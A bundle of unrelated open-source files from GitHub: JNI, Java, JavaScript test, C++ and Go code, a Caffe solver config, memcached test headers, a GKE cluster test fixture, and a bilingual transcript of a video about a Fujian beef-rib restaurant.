* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
#include "jvm.h"
#include "java_lang_ref_Reference.h"
JNIEXPORT jobject JNICALL
Java_java_lang_ref_Reference_getAndClearReferencePendingList(JNIEnv *env, jclass ignore)
{
return JVM_GetAndClearReferencePendingList(env);
}
JNIEXPORT jboolean JNICALL
Java_java_lang_ref_Reference_hasReferencePendingList(JNIEnv *env, jclass ignore)
{
return JVM_HasReferencePendingList(env);
}
JNIEXPORT void JNICALL
Java_java_lang_ref_Reference_waitForReferencePendingList(JNIEnv *env, jclass ignore)
{
JVM_WaitForReferencePendingList(env);
}
| {
"pile_set_name": "Github"
} |
package invokestatic.issue4;
public class AB extends codeforjar.A {
}
| {
"pile_set_name": "Github"
} |
// DATA_TEMPLATE: empty_table
oTest.fnStart( "bProcessing" );
/* It's actually a bit hard to set this one due to the fact that it will only be shown
* when DataTables is doing some kind of processing. The server-side processing is a bit
 * better to test this than here - so we just use the internal functions to enable it and check
* that it is available
*/
$(document).ready( function () {
/* Check the default */
var oTable = $('#example').dataTable( {
"sAjaxSource": "../../../examples/ajax/sources/arrays.txt",
"bDeferRender": true
} );
var oSettings = oTable.fnSettings();
oTest.fnWaitTest(
"Processing is off by default",
null,
function () { return oSettings.oFeatures.bProcessing == false; }
);
oTest.fnWaitTest(
"Processing div is not in the DOM",
function () { oTable.oApi._fnProcessingDisplay( oSettings, true ); },
function () { return document.getElementById('example_processing') == null; }
);
oTest.fnWaitTest(
"Processing div cannot be shown",
function () { oTable.oApi._fnProcessingDisplay( oSettings, true ); },
function () { return document.getElementById('example_processing') == null; }
);
oTest.fnWaitTest(
"Processing div cannot be hidden",
function () { oTable.oApi._fnProcessingDisplay( oSettings, false ); },
function () { return document.getElementById('example_processing') == null; }
);
/* Check can disable */
oTest.fnWaitTest(
"Processing can be enabled",
function () {
oSession.fnRestore();
oTable = $('#example').dataTable( {
"sAjaxSource": "../../../examples/ajax/sources/arrays.txt",
"bDeferRender": true,
"bProcessing": true
} );
oSettings = oTable.fnSettings();
},
function () { return oSettings.oFeatures.bProcessing == true; }
);
oTest.fnWaitTest(
"Processing div is in the DOM",
function () { oTable.oApi._fnProcessingDisplay( oSettings, true ); },
function () { return document.getElementById('example_processing'); }
);
oTest.fnWaitTest(
"Processing div is hidden by default",
function () { oTable.oApi._fnProcessingDisplay( oSettings, true ); },
function () { return document.getElementById('example_processing').style.visibility = "hidden"; }
);
oTest.fnWaitTest(
"Processing div can be shown",
function () { oTable.oApi._fnProcessingDisplay( oSettings, true ); },
		function () { return document.getElementById('example_processing').style.visibility == "visible"; }
);
oTest.fnWaitTest(
"Processing div can be hidden",
function () { oTable.oApi._fnProcessingDisplay( oSettings, false ); },
		function () { return document.getElementById('example_processing').style.visibility == "hidden"; }
);
/* Enable makes no difference */
oTest.fnWaitTest(
"Processing disabled override",
function () {
oSession.fnRestore();
oTable = $('#example').dataTable( {
"sAjaxSource": "../../../examples/ajax/sources/arrays.txt",
"bDeferRender": true,
"bProcessing": false
} );
oSettings = oTable.fnSettings();
},
function () { return oSettings.oFeatures.bProcessing == false; }
);
oTest.fnWaitTest(
"Processing div is not in the DOM",
function () { oTable.oApi._fnProcessingDisplay( oSettings, true ); },
function () { return document.getElementById('example_processing') == null; }
);
oTest.fnComplete();
} ); | {
"pile_set_name": "Github"
} |
package example.service;
import example.repo.Customer1287Repository;
import org.springframework.stereotype.Service;
@Service
public class Customer1287Service {
public Customer1287Service(Customer1287Repository repo) {
}
}
| {
"pile_set_name": "Github"
} |
///////////////////////////////////////////////////////////////////////////////
// Name: wx/osx/evtloop.h
// Purpose: simply forwards to wx/osx/carbon/evtloop.h or
// wx/osx/cocoa/evtloop.h for consistency with the other Mac
// headers
// Author: Vadim Zeitlin
// Modified by:
// Created: 2006-01-12
// Copyright: (c) 2006 Vadim Zeitlin <[email protected]>
// Licence: wxWindows licence
///////////////////////////////////////////////////////////////////////////////
#ifndef _WX_OSX_EVTLOOP_H_
#define _WX_OSX_EVTLOOP_H_
#ifdef __WXOSX_COCOA__
#include "wx/osx/cocoa/evtloop.h"
#else
#include "wx/osx/carbon/evtloop.h"
#endif
class WXDLLIMPEXP_FWD_CORE wxWindow;
class WXDLLIMPEXP_FWD_CORE wxNonOwnedWindow;
class WXDLLIMPEXP_CORE wxModalEventLoop : public wxGUIEventLoop
{
public:
wxModalEventLoop(wxWindow *modalWindow);
wxModalEventLoop(WXWindow modalNativeWindow);
#ifdef __WXOSX_COCOA__
// skip wxGUIEventLoop to avoid missing Enter/Exit notifications
virtual int Run() { return wxCFEventLoop::Run(); }
virtual bool ProcessIdle();
#endif
protected:
virtual void OSXDoRun();
virtual void OSXDoStop();
// (in case) the modal window for this event loop
wxNonOwnedWindow* m_modalWindow;
WXWindow m_modalNativeWindow;
};
#endif // _WX_OSX_EVTLOOP_H_
| {
"pile_set_name": "Github"
} |
https://www.youtube.com/watch?v=WPcUQqMEGss
标题:福建大叔炖牛排,15元一块肉,就肉汤能吃一碗饭!卖完200斤就关门
This Fujian uncle makes stewed beef ribs and beef soup! 100kg beef is sold everyday
描述:
福建百年老店,大叔一家6口人做牛排快餐,
15元一根牛肋排,咖喱味道的,
吃起来辛辣味十足,就着肉汤都能吃饱!
大叔家一天只卖200斤牛排,80斤牛肉羹,想吃的得早点来。
This is a 100-year-old restaurant in Fujian selling beef rib fast food, run by an uncle and his 6-member family.
With 15 yuan, you get a curry flavored beef rib.
With an intense spicy flavor, it fills you up so well together with the beef soup!
The uncle sells only 100kg of beef ribs and 40kg of beef soup every day. If you want to have some, come early.
福建 泉州市(地名)
Quanzhou, Fujian
(炖牛排 肉粽)
(Beef rib stew & meat zongzi)
这就是牛排
These are braised beef ribs
这里还有酸菜 萝卜
And they also have pickles and radish
它这边也有套餐
They have combo as well
咸饭 牛排
Salty rice and beef rib
你好 我要这个牛排
Hello. I want this beef rib
两碗米饭
Two bowls of rice
再要一个牛肉羹
And a beef soup
要一个大碗还是小碗
Big bowl or small bowl?
小碗就可以
Small bowl
牛排就一小份 牛肉羹也是一小碗
The beef rib is just a small portion, and the beef soup is a small bowl too
那拿两个牛排吧
Two beef ribs then
牛排两个 那汤只要一碗
Two beef ribs and one bowl of soup
汤只要一碗
Only one bowl of soup
咸菜 青菜需要吗
Need pickles and vegetables?
不需要 谢谢
No thanks
46块钱
46 yuan
扫码(手机付款)后拿着单子去前面取菜
Scan the code to pay. Then take the receipt to get your order
我的钱付过去了
Paid
(牛肉羹)
Beef soup
(咸饭)
Salty rice
(给我的是咸饭?)
(Did I order salty rice?)
(牛排)
(Beef rib)
我看很多评论都会说
I read a lot of comments asking
为什么不给摄影师吃呢
why I never let the cameraman eat
这次就给摄影师傅吃
We let him eat this time
加了一块肉 加了一碗咸饭
We added an extra piece of meat and an extra bowl of salty rice
他们这边的米饭是11点半之后
They have plain rice
才有这种白米饭
Only after 11:30 am
11点半之前都是这种咸饭
They only have salty rice before 11:30 am
一看就是加了胡萝卜
Obviously, they added carrots in
有味道的咸饭
Seasoned salty rice
这次咱们主要是来吃牛排
We came here mainly for the beef rib
这个牛排是这种炖的牛排
This is stewed beef rib
15块钱一块儿
15 yuan for each
还有一碗 这个是10块钱的牛肉羹
And this beef soup is 10 yuan
再加了一个3块钱的咸饭
And we added 3 yuan salty rice
刚才点餐的时候
When we were ordering
点餐的小哥哥说
the cashier bro said that
这个牛排很小 确实是很小
the beef rib is small in size. It's indeed very small
只有这么一小碟的肉
Such a small dish of beef rib
牛排是带骨头的牛肋排
This is beef ribs with bones
和咱们平常说的西式的牛排是不一样的
Which is different from western style rib steak
它这个是炖出来的
They stewed the beef rib
它一看就是炖的特别烂
You can tell at a glance it's been stewed until extremely tender
(肉烂脱骨)
Meat is easy to take off bones
(直接撕着吃)
Just pull and eat
牛排其实颜色比较深
This beef rib is in dark color
下面汤汁里的油还是有很多的
And the sauce below contains a lot of oil
用它来配米饭 应该还不错
So it seems good to go with rice
吃起来有这种咖喱的味道
It has a curry flavor
还有这种黑胡椒粉 辛辣的味道
And the spicy flavor of pepper powder
牛肉其实瘦肉比较多
In fact it is mostly lean meat
但是有了汤汁之后
But with the sauce
就会觉得牛排没有那么柴
the beef rib doesn't taste that dry
(拿下来了吧)
(We've taken it off)
这是我喜欢的味道
That's the flavor I like
很滑啊 朝哪走啊
It's so slippery. Don't go
对比这几天吃的饭你会发现
Compared with food we had recently
这个牛排还属于比较重口的
This beef rib has a relatively intense taste
其他的饮食都是比较清淡的
While the others are relatively mild
我们主打的就是牛排 牛肉羹
Our specialty dish is beef rib and beef soup
其实也没有其他很多的小菜
Not that many side dishes
主要就是牛肉 牛排
Mainly it is beef and ribs
(我们专业就是做这个)
We are pro in it
(四代人)
Four generations
(四代人都是做这个)
Four generations doing this
刚才那个收银员是您儿子
Is that cashier your son?
他第四代 我第三代
He is the fourth generation. I’m the third
我看咱这边的牛排 其实
It seems to me that your beef rib here
和其他地方的牛排都不太一样
is different from those at other places
做法不一样
We have a different recipe
是
yeah
而且牛排是这种比较小的
This type of beef rib is smaller
我们基本上都是传统的做法
We cook it the traditional way
嗯 对 牛肉羹都是手工的
Yeah, our beef soup is handmade too
这边牛排是这种咖喱味的是吧
Is this beef rib with curry flavor
放一点咖喱
With a little curry
放一点那个
And with
(姜 葱)
Ginger and green onions
大叔 这个店一般是几点开始营业
Uncle, when is it open everyday?
我们早上基本上
We open at 10 am
正常营业是早上十点
Usually
到晚上八点
Off by 8pm
早卖完就早收
We close early when it is sold out
没有超过8点的
No later than 8pm
(固定量的呀 原来是)
Oh, a fixed amount to sell, do you mean?
一天卖多少 固定
The same amount for every day. It's fixed.
(习惯性用倒装句)
Habitual inverted sentence
早卖完就卖完了 就收摊了
Just close early when we are sold out early
没有了 就这样子
All gone, like that
(牛排200斤左右)
About 200 jin of beef rib (1 jin = 500g)
(牛肉羹差不都80多斤)
About 80 jin of beef soup
有时候六点钟 七点钟就关门了 没有了
Sometimes we close by 6 or 7pm if we are sold out early
基本上没有超过8点(关门)的
No later than 8pm, basically
一天卖两餐的 基本上晚上就没有了
We serve two meal times a day. Basically it's all gone by evening.
(就不卖了?)
No business then?
(是没有了 不说不卖)
It's just sold out, not that we stop selling
钱给我们赚 我们都是(卖东西的)
There's no way we reject money
我们这个店是家庭式的
We are a family restaurant
主要我们这个是家庭式
Because of that
只雇佣了2个工人
We only hire two workers
只雇佣了2个工人?
Only 2 workers?
加上我们一家六个人
Yeah, plus the six of us in the family
自己做 这个手艺是家庭式的
We make it ourselves; the craft is a family tradition
做这个牛肉就是用心去做
We cook with our heart
就做的好
That’s why our beef is delicious
我跟我儿子讲 要用心去做 做得好
I told my son to put his heart in cooking to excel
不要失传 一代传一代
Don't let it be lost; pass it on from generation to generation
(关注 雪鱼探店)
(Subscribe)
| {
"pile_set_name": "Github"
} |
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package resourcelock
import (
"encoding/json"
"errors"
"fmt"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/kubernetes/pkg/api/v1"
corev1client "k8s.io/kubernetes/pkg/client/clientset_generated/clientset/typed/core/v1"
)
// TODO: This is almost an exact replica of the Endpoints lock.
// going forwards as we self host more and more components
// and use ConfigMaps as the means to pass that configuration
// data we will likely move to deprecate the Endpoints lock.
type ConfigMapLock struct {
// ConfigMapMeta should contain a Name and a Namespace of a
// ConfigMap object that the LeaderElector will attempt to lead.
ConfigMapMeta metav1.ObjectMeta
Client corev1client.ConfigMapsGetter
LockConfig ResourceLockConfig
cm *v1.ConfigMap
}
// Get returns the election record from a ConfigMap Annotation
func (cml *ConfigMapLock) Get() (*LeaderElectionRecord, error) {
var record LeaderElectionRecord
var err error
cml.cm, err = cml.Client.ConfigMaps(cml.ConfigMapMeta.Namespace).Get(cml.ConfigMapMeta.Name, metav1.GetOptions{})
if err != nil {
return nil, err
}
if cml.cm.Annotations == nil {
cml.cm.Annotations = make(map[string]string)
}
if recordBytes, found := cml.cm.Annotations[LeaderElectionRecordAnnotationKey]; found {
if err := json.Unmarshal([]byte(recordBytes), &record); err != nil {
return nil, err
}
}
return &record, nil
}
// Create attempts to create a LeaderElectionRecord annotation
func (cml *ConfigMapLock) Create(ler LeaderElectionRecord) error {
recordBytes, err := json.Marshal(ler)
if err != nil {
return err
}
cml.cm, err = cml.Client.ConfigMaps(cml.ConfigMapMeta.Namespace).Create(&v1.ConfigMap{
ObjectMeta: metav1.ObjectMeta{
Name: cml.ConfigMapMeta.Name,
Namespace: cml.ConfigMapMeta.Namespace,
Annotations: map[string]string{
LeaderElectionRecordAnnotationKey: string(recordBytes),
},
},
})
return err
}
// Update will update an existing annotation on a given resource.
func (cml *ConfigMapLock) Update(ler LeaderElectionRecord) error {
if cml.cm == nil {
return errors.New("endpoint not initialized, call get or create first")
}
recordBytes, err := json.Marshal(ler)
if err != nil {
return err
}
cml.cm.Annotations[LeaderElectionRecordAnnotationKey] = string(recordBytes)
cml.cm, err = cml.Client.ConfigMaps(cml.ConfigMapMeta.Namespace).Update(cml.cm)
return err
}
// RecordEvent in leader election while adding meta-data
func (cml *ConfigMapLock) RecordEvent(s string) {
events := fmt.Sprintf("%v %v", cml.LockConfig.Identity, s)
cml.LockConfig.EventRecorder.Eventf(&v1.ConfigMap{ObjectMeta: cml.cm.ObjectMeta}, v1.EventTypeNormal, "LeaderElection", events)
}
// Describe is used to convert details on current resource lock
// into a string
func (cml *ConfigMapLock) Describe() string {
return fmt.Sprintf("%v/%v", cml.ConfigMapMeta.Namespace, cml.ConfigMapMeta.Name)
}
// Identity returns the Identity of the lock
func (cml *ConfigMapLock) Identity() string {
return cml.LockConfig.Identity
}
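A minimal usage sketch, not part of the original file: it shows the Get-then-Create flow against the ConfigMap annotation using only the types above. The HolderIdentity and LeaseDurationSeconds fields of LeaderElectionRecord are assumed from the wider leader-election package (they are not defined in this file), and the namespace, name and identity strings are placeholders.

// Hypothetical companion file in the same package, for illustration only.
package resourcelock

import (
	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	corev1client "k8s.io/kubernetes/pkg/client/clientset_generated/clientset/typed/core/v1"
)

// acquireExample reads the current election record and, if Get fails
// (simplified here to mean "the ConfigMap does not exist yet"), creates the
// ConfigMap with this candidate as the holder. A real elector would inspect
// the returned record and periodically call Update to renew its lease.
func acquireExample(client corev1client.ConfigMapsGetter, ns, name, id string) error {
	lock := &ConfigMapLock{
		ConfigMapMeta: metav1.ObjectMeta{Namespace: ns, Name: name},
		Client:        client,
		LockConfig:    ResourceLockConfig{Identity: id},
	}
	if _, err := lock.Get(); err != nil {
		return lock.Create(LeaderElectionRecord{
			HolderIdentity:       id, // assumed field name
			LeaseDurationSeconds: 15, // assumed field name
		})
	}
	return nil
}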
| {
"pile_set_name": "Github"
} |
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef BASE_SEQUENCE_CHECKER_H_
#define BASE_SEQUENCE_CHECKER_H_
#include "base/compiler_specific.h"
#include "base/logging.h"
#include "base/sequence_checker_impl.h"
#include "base/strings/string_piece.h"
#include "build/build_config.h"
// SequenceChecker is a helper class used to help verify that some methods of a
// class are called sequentially (for thread-safety). It supports thread safety
// annotations (see base/thread_annotations.h).
//
// Use the macros below instead of the SequenceChecker directly so that the
// unused member doesn't result in an extra byte (four when padded) per
// instance in production.
//
// This class is much preferred to ThreadChecker for thread-safety checks.
// ThreadChecker should only be used for classes that are truly thread-affine
// (use thread-local-storage or a third-party API that does).
//
// Usage:
// class MyClass {
// public:
// MyClass() {
// // It's sometimes useful to detach on construction for objects that are
// // constructed in one place and forever after used from another
// // sequence.
// DETACH_FROM_SEQUENCE(my_sequence_checker_);
// }
//
// ~MyClass() {
// // SequenceChecker doesn't automatically check it's destroyed on origin
// // sequence for the same reason it's sometimes detached in the
// // constructor. It's okay to destroy off sequence if the owner
// // otherwise knows usage on the associated sequence is done. If you're
// // not detaching in the constructor, you probably want to explicitly
// // check in the destructor.
// DCHECK_CALLED_ON_VALID_SEQUENCE(my_sequence_checker_);
// }
// void MyMethod() {
// DCHECK_CALLED_ON_VALID_SEQUENCE(my_sequence_checker_);
// ... (do stuff) ...
// MyOtherMethod();
// }
//
// void MyOtherMethod()
// VALID_CONTEXT_REQUIRED(my_sequence_checker_) {
// foo_ = 42;
// }
//
// private:
// // GUARDED_BY_CONTEXT() enforces that this member is only
// // accessed from a scope that invokes DCHECK_CALLED_ON_VALID_SEQUENCE()
// // or from a function annotated with VALID_CONTEXT_REQUIRED(). A
// // DCHECK build will not compile if the member is accessed and these
// // conditions are not met.
// int foo_ GUARDED_BY_CONTEXT(my_sequence_checker_);
//
// SEQUENCE_CHECKER(my_sequence_checker_);
// }
#define SEQUENCE_CHECKER_INTERNAL_CONCAT2(a, b) a##b
#define SEQUENCE_CHECKER_INTERNAL_CONCAT(a, b) \
SEQUENCE_CHECKER_INTERNAL_CONCAT2(a, b)
#define SEQUENCE_CHECKER_INTERNAL_UID(prefix) \
SEQUENCE_CHECKER_INTERNAL_CONCAT(prefix, __LINE__)
#if DCHECK_IS_ON()
#define SEQUENCE_CHECKER(name) base::SequenceChecker name
#define DCHECK_CALLED_ON_VALID_SEQUENCE(name, ...) \
base::ScopedValidateSequenceChecker SEQUENCE_CHECKER_INTERNAL_UID( \
scoped_validate_sequence_checker_)(name, ##__VA_ARGS__);
#define DETACH_FROM_SEQUENCE(name) (name).DetachFromSequence()
#else // DCHECK_IS_ON()
#if __OBJC__ && defined(OS_IOS) && !HAS_FEATURE(objc_cxx_static_assert)
// TODO(thakis): Remove this branch once Xcode's clang has clang r356148.
#define SEQUENCE_CHECKER(name)
#else
#define SEQUENCE_CHECKER(name) static_assert(true, "")
#endif
#define DCHECK_CALLED_ON_VALID_SEQUENCE(name, ...) EAT_STREAM_PARAMETERS
#define DETACH_FROM_SEQUENCE(name)
#endif // DCHECK_IS_ON()
namespace base {
// Do nothing implementation, for use in release mode.
//
// Note: You should almost always use the SequenceChecker class (through the
// above macros) to get the right version for your build configuration.
// Note: This is only a check, not a "lock". It is marked "LOCKABLE" only in
// order to support thread_annotations.h.
class LOCKABLE SequenceCheckerDoNothing {
public:
SequenceCheckerDoNothing() = default;
// Moving between matching sequences is allowed to help classes with
// SequenceCheckers that want a default move-construct/assign.
SequenceCheckerDoNothing(SequenceCheckerDoNothing&& other) = default;
SequenceCheckerDoNothing& operator=(SequenceCheckerDoNothing&& other) =
default;
bool CalledOnValidSequence() const WARN_UNUSED_RESULT { return true; }
void DetachFromSequence() {}
private:
DISALLOW_COPY_AND_ASSIGN(SequenceCheckerDoNothing);
};
#if DCHECK_IS_ON()
class SequenceChecker : public SequenceCheckerImpl {
};
#else
class SequenceChecker : public SequenceCheckerDoNothing {
};
#endif // DCHECK_IS_ON()
class SCOPED_LOCKABLE ScopedValidateSequenceChecker {
public:
explicit ScopedValidateSequenceChecker(const SequenceChecker& checker)
EXCLUSIVE_LOCK_FUNCTION(checker) {
DCHECK(checker.CalledOnValidSequence());
}
explicit ScopedValidateSequenceChecker(const SequenceChecker& checker,
const StringPiece& msg)
EXCLUSIVE_LOCK_FUNCTION(checker) {
DCHECK(checker.CalledOnValidSequence()) << msg;
}
~ScopedValidateSequenceChecker() UNLOCK_FUNCTION() {}
private:
};
} // namespace base
#endif // BASE_SEQUENCE_CHECKER_H_
| {
"pile_set_name": "Github"
} |
net: "examples/finetune_pascal_detection/pascal_finetune_trainval_test.prototxt"
test_iter: 100
test_interval: 1000
base_lr: 0.001
lr_policy: "step"
gamma: 0.1
stepsize: 20000
display: 20
max_iter: 100000
momentum: 0.9
weight_decay: 0.0005
snapshot: 10000
snapshot_prefix: "examples/finetune_pascal_detection/pascal_det_finetune"
| {
"pile_set_name": "Github"
} |
/* -*- Mode: C; tab-width: 4; c-basic-offset: 4; indent-tabs-mode: nil -*- */
#if !defined(_dummy_memcached_h_)
#define _dummy_memcached_h_
#include "generic.h"
#include <netinet/in.h>
#include <sys/time.h>
#define V_LPRINTF(min_verbosity, string, ...) \
if (verbose >= min_verbosity) { \
fprintf(stdout, " *%s", \
&indent_str[sizeof(indent_str) - min_verbosity - 1]); \
fprintf(stdout, string, ##__VA_ARGS__); \
} \
#define V_PRINTF(min_verbosity, string, ...) if (verbose >= min_verbosity) fprintf(stdout, string, ##__VA_ARGS__)
#define V_FLUSH(min_verbosity) if (verbose >= min_verbosity) fflush(stdout)
#if defined(DEBUG)
#define TASSERT(expr, ...) if (! (expr)) { if (verbose) { printf("assertion failed(%d): %s", __LINE__, #expr); printf("\n" __VA_ARGS__); } assert(0); }
#else
#define TASSERT(expr, ...) if (! (expr)) { if (verbose) { printf("assertion failed(%d): %s", __LINE__, #expr); printf("\n" __VA_ARGS__); } return 1; }
#endif /* #if defined(DEBUG) */
extern const char indent_str[257];
#if defined(INIT_TEST)
#include "init_test.h"
#endif /* #if defined(INIT_TEST) */
#if defined(INLINE_TEST)
#include "inline_test.h"
#endif /* #if defined(INLINE_TEST) */
#if defined(ALLOC_DEALLOC_TEST)
#include "alloc_dealloc_test.h"
#endif /* #if defined(ALLOC_DEALLOC_TEST) */
#if defined(ITEM_WALK_TEST)
#include "item_walk_test.h"
#endif /* #if defined(ITEM_WALK_TEST) */
#if defined(PAGING_TEST)
#include "paging_test.h"
#endif /* #if defined(PAGING_TEST) */
#if defined(ASSOC_TEST)
#include "assoc_test.h"
#endif /* #if defined(ASSOC_TEST) */
#if defined(ALLOC_LARGE_LRU_EVICT_TEST)
#include "alloc_large_lru_evict_test.h"
#endif /* #if defined(ALLOC_LARGE_LRU_EVICT_TEST) */
#if defined(ALLOC_SMALL_LRU_EVICT_TEST)
#include "alloc_small_lru_evict_test.h"
#endif /* #if defined(ALLOC_SMALL_LRU_EVICT_TEST) */
#if defined(COMPLEX_ALLOC_TEST)
#include "complex_alloc_test.h"
#endif /* #if defined(COMPLEX_ALLOC_TEST) */
#if !defined(MAX_ITEM_SIZE)
#define MAX_ITEM_SIZE (1024 * 1024)
#endif /* #if !defined(MAX_ITEM_SIZE) */
#if !defined(KEY_MAX_LENGTH)
#define KEY_MAX_LENGTH 255
#endif /* #if !defined(KEY_MAX_LENGTH) */
/*
* We only reposition items in the LRU queue if they haven't been repositioned
* in this many seconds. That saves us from churning on frequently-accessed
* items.
*/
#if !defined(ITEM_UPDATE_INTERVAL)
#define ITEM_UPDATE_INTERVAL 60
#endif /* #if !defined(ITEM_UPDATE_INTERVAL) */
#if !defined(MAX_KEYS)
#define MAX_KEYS (16 * 1024)
#endif /* #if !defined(MAX_KEYS) */
#if !defined(item_get_notedeleted)
#define item_get_notedeleted do_item_get_notedeleted
#endif /* #if !defined(item_get_notedeleted) */
#if !defined(stats_prefix_record_removal)
#define stats_prefix_record_removal(a, b, c, d, e) ;
#endif /* #if !defined(stats_prefix_record_removal) */
#if !defined(stats_evict)
#define stats_evict(a) ;
#endif /* #if !defined(stats_evict) */
#if !defined(stats_expire)
#define stats_expire(a) ;
#endif /* #if !defined(stats_expire) */
#if !defined(TOTAL_MEMORY)
#define TOTAL_MEMORY (4 * 1024 * 1024)
#endif /* #if !defined(TOTAL_MEMORY) */
#if !defined(FLAGS)
#define FLAGS 0xdeadbeef
#endif /* #if !defined(FLAGS) */
#if !defined(KEY)
#define KEY "abcde"
#endif /* #if !defined(KEY) */
#define ITEM_CACHEDUMP_LIMIT (2 * 1024 * 1024)
#define ITEM_STATS_SIZES (2 * 1024 * 1024)
#include "items.h"
#include "conn_buffer.h"
typedef struct conn_s conn;
struct conn_s {
conn_buffer_group_t* cbg;
bool binary;
struct iovec* riov; /* read iov */
size_t riov_size; /* number of read iovs allocated */
size_t riov_curr; /* current read iov being sent */
size_t riov_left; /* number of read iovs left to send */
char crlf[2]; /* used to receive cr-lfs from the ascii protocol. */
};
typedef struct stats_s stats_t;
struct stats_s {
unsigned int curr_items;
unsigned int total_items;
uint64_t item_storage_allocated;
uint64_t item_total_size;
unsigned int curr_conns;
unsigned int total_conns;
unsigned int conn_structs;
uint64_t get_cmds;
uint64_t set_cmds;
uint64_t get_hits;
uint64_t get_misses;
uint64_t evictions;
time_t started; /* when the process was started */
uint64_t bytes_read;
uint64_t bytes_written;
#define MEMORY_POOL(pool_enum, pool_counter, pool_string) uint64_t pool_counter;
#include "memory_pool_classes.h"
struct {
#define MEMORY_POOL(pool_enum, pool_counter, pool_string) uint64_t pool_counter;
#include "memory_pool_classes.h"
} mp_bytecount_errors_realloc_split;
struct {
#define MEMORY_POOL(pool_enum, pool_counter, pool_string) uint64_t pool_counter;
#include "memory_pool_classes.h"
} mp_bytecount_errors_free_split;
};
typedef struct settings_s settings_t;
struct settings_s {
size_t maxbytes;
int maxconns;
int port;
int udpport;
int binary_port;
int binary_udpport;
struct in_addr interf;
int verbose;
rel_time_t oldest_live; /* ignore existing items older than this */
bool managed; /* if 1, a tracker manages virtual buckets */
int evict_to_free;
char *socketpath; /* path to unix socket if using local socket */
double factor; /* chunk size growth factor */
int chunk_size;
int num_threads; /* number of libevent threads to run */
char prefix_delimiter; /* character that marks a key prefix (for stats) */
int detail_enabled; /* nonzero if we're collecting detailed stats */
};
extern settings_t settings;
extern rel_time_t current_time;
extern stats_t stats;
static inline int add_iov(conn* c, const void* ptr, const size_t size, bool is_first) { return 0; }
typedef struct {
const item* it;
} find_in_lru_context_t;
typedef bool (*find_in_lru_funcptr_t) (const item* const item_to_be_tested,
find_in_lru_context_t context);
extern bool find_in_lru_by_item_comparator(const item* item_to_be_tested, find_in_lru_context_t context);
extern const item* find_in_lru_by_funcptr(find_in_lru_funcptr_t comparator,
find_in_lru_context_t context);
extern int check_lru_order(const item* item1, const item* item2);
extern int make_random_key(char* key, size_t key_size, bool max);
static inline const item* find_in_lru_by_item(const item* item_to_be_found) {
find_in_lru_context_t temp;
temp.it = item_to_be_found;
return find_in_lru_by_funcptr(find_in_lru_by_item_comparator,
temp);
}
size_t append_to_buffer(char* const buffer_start,
const size_t buffer_size,
const size_t buffer_off,
const size_t reserved,
const char* fmt,
...);
/* declaration of tests. */
typedef int (*tester_f)(int);
typedef struct {
tester_f func;
int is_fast;
} tester_info_t;
extern bool fa_freelist_check(const chunk_type_t ctype);
extern bool lru_check(void);
extern bool item_chunk_check(const item* it);
extern int verify_key(const item* it, const char* key);
#define STATS_LOCK() ;
#define STATS_UNLOCK() ;
#include "memory_pool.h"
#endif /* #if !defined(_dummy_memcached_h_) */
| {
"pile_set_name": "Github"
} |
# flake8: noqa
GKE_RESPONSE = {
'clusters': [{
'selfLink': 'https://container.googleapis.com/v1/projects/test-cluster/locations/europe-west2/clusters/test-cluster',
'createTime': '2019-01-01T00:00:00+00:00',
'name': 'test-cluster',
'description': 'Test cluster',
'loggingService': 'logging.googleapis.com',
'monitoringService': 'none',
'network': 'test-cluster',
'subnetwork': 'test-cluster',
'clusterIpv4Cidr': '0.0.0.0/14',
'zone': 'europe-west2',
'location': 'europe-west2',
'endpoint': '0.0.0.0',
'initialClusterVersion': '1.12.10-gke.15',
'currentMasterVersion': '1.14.10-gke.27',
'status': 'RUNNING',
'servicesIpv4Cidr': '0.0.0.0/15',
'databaseEncryption': {
'state': 'DECRYPTED',
},
'locations': [
'europe-west2-c',
'europe-west2-b',
'europe-west2-a',
],
'networkPolicy': {
'provider': 'CALICO',
'enabled': True,
},
'maintenancePolicy': {
'window': {
'dailyMaintenanceWindow': {
'startTime': '01:00',
'duration': 'PT4H0M0S',
},
},
'resourceVersion': '111111',
},
'defaultMaxPodsConstraint': {
'maxPodsPerNode': '10',
},
'masterAuthorizedNetworksConfig': {
'enabled': True,
},
'networkConfig': {
'network': 'projects/test-cluster/global/networks/test-cluster',
'subnetwork': 'projects/test-cluster/regions/europe-west2/subnetworks/test-cluster',
},
'addonsConfig': {
'httpLoadBalancing': {
'disabled': True,
},
'horizontalPodAutoscaling': {
'disabled': True,
},
'kubernetesDashboard': {
'disabled': True,
},
'networkPolicyConfig': {},
},
'legacyAbac': {},
'shieldedNodes': {},
'ipAllocationPolicy': {
'useIpAliases': True,
'clusterIpv4Cidr': '0.0.0.0/14',
'servicesIpv4Cidr': '0.0.0.0/15',
'clusterSecondaryRangeName': 'pods',
'servicesSecondaryRangeName': 'services',
'clusterIpv4CidrBlock': '0.0.0.0/14',
'servicesIpv4CidrBlock': '0.0.0.0/15',
},
'privateClusterConfig': {
'enablePrivateNodes': True,
'enablePrivateEndpoint': True,
'masterIpv4CidrBlock': '0.0.0.0/28',
'privateEndpoint': '0.0.0.0',
'publicEndpoint': '0.0.0.0',
'peeringName': 'gke-111111-1111-1111-peer',
},
'masterAuth': {
'clusterCaCertificate': '11111',
},
'nodePools': [{
'name': 'default-111-111-111-111-gke-17',
'config': {
'machineType': 'n1-standard-8',
'diskSizeGb': 50,
'oauthScopes': [
'https://www.googleapis.com/auth/compute',
],
'metadata': {
'disable-legacy-endpoints': 'true',
},
'imageType': 'COS',
'tags': ['default-node'],
'serviceAccount':
'[email protected]',
'diskType': 'pd-standard',
'shieldedInstanceConfig': {
'enableIntegrityMonitoring': True,
},
},
'initialNodeCount': 2,
'management': {
'autoRepair': True,
},
'maxPodsConstraint': {
